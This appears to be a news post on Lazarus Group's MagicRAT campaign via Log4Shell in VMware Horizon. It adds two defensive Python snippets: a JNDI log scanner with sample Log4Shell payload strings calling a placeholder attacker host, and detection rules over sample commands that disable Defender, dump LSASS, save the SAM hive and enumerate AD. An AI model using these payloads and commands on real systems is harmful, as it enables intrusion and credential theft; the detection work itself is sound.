Posted on September 8, 2022 at 8:41 PM
The notorious North Korean nation-state actor Lazarus Group has been linked to a new remote access Trojan known as MagicRAT.
A report from Cisco Talos revealed that the group exploited VMware Horizon servers to gain access to the corporate networks of energy providers in Japan, Canada, and the United States.
Lazarus is a nation-state threat actor notorious for cyber espionage, cryptocurrency theft, and data theft campaigns over the past decade. The group has been linked to hundreds of high-profile attacks worldwide.
Cisco Talos researchers stated that Lazarus targeted energy organizations between February and July 2022, using exploits against VMware Horizon servers to gain initial access.
After gaining initial access, the attackers deployed custom malware families such as “YamaBot” and “VSingle”, as well as “MagicRAT”, a previously unknown remote access Trojan (RAT) used to steal data from compromised hosts.
Symantec analyzed the same activity in April this year and ASEC published its own analysis in May, but Cisco's report goes much deeper and unveils several new details about the threat actor's operations.
The Lazarus Group Utilized Multiple Attack Methods
Cisco Talos noted that the threat actor is now using multiple attack strategies. This illustrates Lazarus' latest tactics, techniques, and procedures (TTPs) and shows the versatility of this highly skilled and experienced group.
In the first case, the group exploited VMware Horizon servers vulnerable to Log4Shell (CVE-2021-44228). The exploit ran shellcode that established a reverse shell, giving the attackers arbitrary command execution on the compromised host.
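As an added illustration of the initial-access step (example code written for this page, not Cisco Talos' tooling and not the attackers' exploit), the following Python snippet scans web server access logs for Log4Shell JNDI lookup strings. It first collapses the nested lookups attackers use to evade simple string matching (the lower/upper transforms and the "x:-default" form), then reports the callback scheme and host. The log lines, paths, timestamps and IP addresses are constructed for the example.

```python
import re

# Constructed Apache/nginx-style access-log lines for this example. The JNDI
# lookup strings are the widely documented Log4Shell forms; the IP addresses,
# paths and timestamps are invented.
SAMPLE_LOG = """\
10.0.0.5 - - [15/Feb/2022:10:01:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [15/Feb/2022:10:01:09 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.7:1389/a}"
203.0.113.7 - - [15/Feb/2022:10:02:31 +0000] "POST /broker/xml HTTP/1.1" 200 88 "-" "${${lower:j}${lower:n}${lower:d}i:${lower:l}dap://203.0.113.7:1389/x}"
203.0.113.7 - - [15/Feb/2022:10:03:15 +0000] "GET /portal/?q=${${env:NaN:-j}ndi${env:NaN:-:}rmi://203.0.113.7:1099/o} HTTP/1.1" 404 0 "-" "curl/7.68.0"
"""

# An innermost ${...} lookup: no nested '$', '{' or '}' inside it.
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# A fully resolved JNDI lookup, capturing the callback scheme and host.
JNDI_LOOKUP = re.compile(
    r"\$\{jndi:(ldap|ldaps|rmi|dns|iiop|corba|nds|http)://([^}/:]+)", re.I)


def _resolve(match):
    """Evaluate one innermost lookup the way the attacker relies on Log4j
    doing it: lower/upper transform the text, 'x:-default' yields the
    default. jndi lookups and unknown lookups are left untouched."""
    body = match.group(1)
    key, _, value = body.partition(":")
    if key.lower() == "jndi":
        return match.group(0)
    if ":-" in body:                      # ${env:NaN:-j} and ${::-j} -> j
        return body.split(":-", 1)[1]
    if key.lower() == "lower":
        return value.lower()
    if key.lower() == "upper":
        return value.upper()
    return match.group(0)                 # unknown lookup: stop resolving


def normalize(text):
    """Repeatedly collapse innermost lookups until nothing changes."""
    previous = None
    while previous != text:
        previous, text = text, INNER_LOOKUP.sub(_resolve, text)
    return text


def find_jndi(line):
    """Return (scheme, callback_host) if the line carries a JNDI lookup."""
    m = JNDI_LOOKUP.search(normalize(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan_log(text):
    """Scan every line; report the client IP (first field) and the callback."""
    hits = []
    for number, line in enumerate(text.splitlines(), 1):
        hit = find_jndi(line)
        if hit:
            hits.append({"line": number, "src": line.split(" ", 1)[0],
                         "scheme": hit[0], "callback": hit[1]})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The resolver only knows the transformations commonly seen in the wild; a lookup it does not understand (for instance a date lookup) stops the collapse, so a secondary rule that alerts on any "${" surviving in a request is a sensible backstop.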
Lazarus then disabled Windows Defender through registry key modifications, PowerShell commands, and WMIC before deploying VSingle.
The Hackers Are Using Different Attack Methods
The VSingle backdoor supports advanced network reconnaissance commands, sets up reverse shell connections, creates new administrative users on the host, and prepares the environment for credential theft. It also connects to its command-and-control (C2) server to retrieve plugins that extend its functionality.
The report also presents a second case involving a different victim that follows a similar access and reconnaissance pattern. This time, however, the threat actor deployed MagicRAT alongside VSingle.
Talos also published a separate post on MagicRAT detailing the functions of the previously unknown Trojan.
According to that post, MagicRAT establishes persistence on its own by executing hardcoded commands that create the required scheduled tasks. It also retrieves additional malware from the C2 server and assists with system reconnaissance.
In the third attack, the threat actor used YamaBot, a custom malware with RAT capabilities written in Go.
The RAT Capabilities Include Uninstalling Itself
Its standard RAT capabilities include executing arbitrary commands on the endpoint, downloading files from remote locations, sending process information to the C2 server, and listing files and directories. It can also uninstall itself.
Lazarus' diversification of the attack chain is not limited to the final malware payloads; it also extends to the reverse or proxy tunneling tools and the credential harvesting methods.
The report also revealed that in some instances Lazarus deployed the ProcDump and Mimikatz tools, while in others the attackers retrieved copies of the registry hives containing AD credentials.
The researchers pointed out one instance in which the threat actor attempted to extract Active Directory information from an endpoint using PowerShell cmdlets, only to use adfind.exe the next day to extract similar details from the same endpoint.
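The Defender tampering through the registry, PowerShell and WMIC, the scheduled-task persistence, the ProcDump/Mimikatz and registry-hive credential dumping, and the PowerShell and adfind.exe AD enumeration described above each leave a distinctive process command line. As an added example for this page (not code from the Talos report and not the actors' tooling), the following Python snippet matches a small rule set against constructed Sysmon-style process-creation events and correlates hits per host, so that one machine showing several of these stages is flagged even though each command on its own might be dismissed as admin activity. Hostnames, timestamps, paths and the exact command lines are invented; the MSFT_MpPreference WMI class and the Get-AD* cmdlets are real Windows and PowerShell interfaces.

```python
import re
from collections import defaultdict

# Constructed process-creation events (Sysmon Event ID 1 / Windows 4688 style).
# Hostnames, timestamps, paths and command lines are invented for this example;
# they mirror the kinds of commands described in the article.
EVENTS = [
    {"host": "SRV-HORIZON01", "time": "2022-02-15T10:05:11Z",
     "cmd": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f'},
    {"host": "SRV-HORIZON01", "time": "2022-02-15T10:05:40Z",
     "cmd": 'powershell.exe -nop -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"host": "SRV-HORIZON01", "time": "2022-02-15T10:06:02Z",
     "cmd": r'wmic.exe /namespace:\\root\Microsoft\Windows\Defender path MSFT_MpPreference call Add ExclusionPath="C:\Windows\Temp"'},
    {"host": "SRV-HORIZON01", "time": "2022-02-15T10:12:27Z",
     "cmd": r'schtasks /create /tn "WindowsUpdateCheck" /tr "C:\Windows\Temp\svchost.exe" /sc onlogon /ru SYSTEM'},
    {"host": "SRV-HORIZON01", "time": "2022-02-15T11:03:05Z",
     "cmd": r'procdump64.exe -accepteula -ma lsass.exe C:\Windows\Temp\l.dmp'},
    {"host": "SRV-HORIZON01", "time": "2022-02-15T11:20:48Z",
     "cmd": 'powershell.exe -c "Get-ADUser -Filter * -Properties * | Export-Csv C:\\Windows\\Temp\\u.csv"'},
    {"host": "SRV-HORIZON01", "time": "2022-02-16T09:41:13Z",
     "cmd": 'adfind.exe -f objectcategory=person -csv'},
    {"host": "WKS-ADMIN07", "time": "2022-02-15T12:00:00Z",
     "cmd": 'schtasks /query /fo LIST'},                      # benign: query, not create
    {"host": "WKS-ADMIN07", "time": "2022-02-15T12:10:30Z",
     "cmd": r'reg save HKLM\SAM C:\Users\Public\sam.hiv'},
    {"host": "WKS-ADMIN07", "time": "2022-02-15T12:11:00Z",
     "cmd": 'powershell.exe -c "Get-Process"'},               # benign
]

# (rule name, ATT&CK tactic, case-insensitive regex over the command line)
RULES = [
    ("defender_registry", "defense_evasion",
     r"\breg(\.exe)?\s+add\s+.*windows defender.*\s/v\s+disable"),
    ("defender_powershell", "defense_evasion", r"set-mppreference\s+-disable\w+"),
    ("defender_wmic", "defense_evasion",
     r"\bwmic(\.exe)?\s+.*(msft_mppreference|windows\\defender)"),
    ("schtasks_create", "persistence", r"\bschtasks(\.exe)?\s+/create\b"),
    ("lsass_dump_tool", "credential_access",
     r"(procdump(64)?(\.exe)?\s+.*\blsass\b|mimikatz|sekurlsa::)"),
    ("hive_save", "credential_access",
     r"\breg(\.exe)?\s+save\s+hk(lm|ey_local_machine)\\(sam|security|system)\b"),
    ("ad_enum_powershell", "discovery", r"get-ad(user|computer|group|domaincontroller)\b"),
    ("ad_enum_adfind", "discovery", r"\badfind(\.exe)?\s"),
]
COMPILED = [(name, tactic, re.compile(pattern, re.I)) for name, tactic, pattern in RULES]
TACTIC = {name: tactic for name, tactic, _ in RULES}


def match_rules(cmd):
    """Names of every rule whose pattern appears in the command line."""
    return [name for name, _, rx in COMPILED if rx.search(cmd)]


def correlate(events, high_threshold=3):
    """Group hits per host. A host showing at least `high_threshold` distinct
    tactics (evasion, persistence, credential access, discovery) is 'high';
    any host with a hit is at least 'medium'."""
    per_host = defaultdict(list)
    for ev in events:
        for name in match_rules(ev["cmd"]):
            per_host[ev["host"]].append((ev["time"], name))
    report = {}
    for host, hits in per_host.items():
        hits.sort()                                   # chronological order
        tactics = sorted({TACTIC[name] for _, name in hits})
        report[host] = {
            "hits": hits,
            "tactics": tactics,
            "severity": "high" if len(tactics) >= high_threshold else "medium",
        }
    return report


if __name__ == "__main__":
    for host, info in correlate(EVENTS).items():
        print(host, info["severity"], info["tactics"])
        for time, name in info["hits"]:
            print("   ", time, name)
```

The per-host correlation is the point: a lone "reg save HKLM\SAM" on an admin workstation is worth a look, but a Horizon server that disables Defender, registers a scheduled task, dumps LSASS and then enumerates AD within a day is the chain the article describes, regardless of which specific tool was swapped in at each step.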
The point of using different methods is to vary the abuse patterns, which makes the activity harder to attribute, detect, and defend against.
As the post notes, cybersecurity firms are closely monitoring Lazarus, so the group is always looking to diversify its attack chain options. Sticking to a single strategy would make it easier for defenders to identify and block the group, so it keeps evolving its attack patterns to stay under the radar for as long as possible.
Lazarus' diversification is also reflected in its range of targets, including IT job seekers, and in its use of ransomware as a decoy, trojanized development tools, and fake cryptocurrency trading apps. It also illustrates the group's capacity to pull off attacks with enormous financial gains, such as the $620 million cryptocurrency heist from the Ronin Network incident.